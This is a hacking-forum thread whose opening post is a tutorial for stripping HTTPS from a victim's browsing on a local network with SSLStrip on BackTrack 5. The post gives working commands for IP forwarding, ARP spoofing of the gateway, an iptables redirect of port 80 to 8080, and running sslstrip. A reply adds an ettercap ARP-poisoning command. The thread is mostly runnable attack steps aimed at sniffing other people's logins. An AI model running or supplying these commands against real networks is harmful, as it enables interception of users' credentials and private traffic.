Login Register






Crack SSL using SSLStrip [BackTrack 5] filter_list
Author
Message
Crack SSL using SSLStrip [BackTrack 5] #1
Hello all..Well this is the tutorial based article, so you must know about SSL (secure socket layer) and something about Backtrack5 because we are using backtrack5 for this tutorial, if you are using some old version like backtrack4 or if you are using some other Linux so you must be sure to install all the dependencies that being used in this tutorial.

Secure socket layer or SSL used to established a secure and encrypt connection between user and the server and we would like to break this secure connection so the sniffing will be occur successfully.


To crack SSL protection we launch man in the middle attack, so doing this we need some tools and the requirement list is

Linux (Backtrack)
Arpspoof
IP Tables
SSL Strip
Netstat



1. Linux OS 2. Arpspoof 3. IPTables 4. SSLStrip 5. NetStat


Now start the game first of all, make your Linux box to start port forwarding use this command.

echo '1' > /proc/sys/net/ipv4/ip_forward

echo '1' > /proc/sys/net/ipv4/ip_forward


After this your Linux box will able to forward all the packets, now you must know about your gateway IP, to know about your gateway use the command

netstat -nr

Now use ARPSpoof to perform attack

arpspoof -i eth0 192.168.8.8

Here eth0 represents the network interface card if you are using wireless link than it may be wlan0, while 192.168.8.8 is the default gateway in your case may be it different normally people are using 192.168.1.1 or 10.0.0.1

Its time to use SSL Strip, download and install SSL strip from the official website shared before, after installation we are using SSL strip, make your firewall to redirect all the traffic from port 80 to port 8080 so use the command

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

After this make all the traffic to go from ARPspoof tables

echo '1' > /proc/sys/net/ipv4/ip_forward

arpspoof -i eth0 192.168.8.8


[Image: bt5-ssl2.jpg]

If your arpspoof start capturing traffic means everything is fine and the time is to use SSL strip use the command below


sslstrip -l 8080

[Image: bt5-ssl3.jpg]

After that your browser address bar does not use https it only use http and the sniffing is so easy.

#################################################
###################~Tut by KaiT_AleX~################
#################################################


[Image: 1308031172619.gif?w=356&h=140]
Don't learn to hack, hack to learn.

Reply

RE: Crack SSL using SSLStrip [BackTrack 5] #2
i use ettercap for this thing. it seems easier (for me). Biggrin

"ettercap -TqM ARP:remote // // -i wlan0 -P autoadd -L logfile" with ip forwarding and sslstrip.
YEAH YEAH.. GIVE ME NEGATIVE REP FOR SAYING TRUTH... BUT ANYWAY WHO CARES!!!. I AM WHO I AM...REPS DO NOT MATTER TO ME.. GIVE ME 1000 -ve REPS, but IF MY POST IS GOOD THEN READERS WILL KNOW

Reply

RE: Crack SSL using SSLStrip [BackTrack 5] #3
(07-31-2011, 02:04 PM)deathknight Wrote: i use ettercap for this thing. it seems easier (for me). Biggrin

"ettercap -TqM ARP:remote // // -i wlan0 -P autoadd -L logfile" with ip forwarding and sslstrip.

me too it's the best combination,"for me"

Reply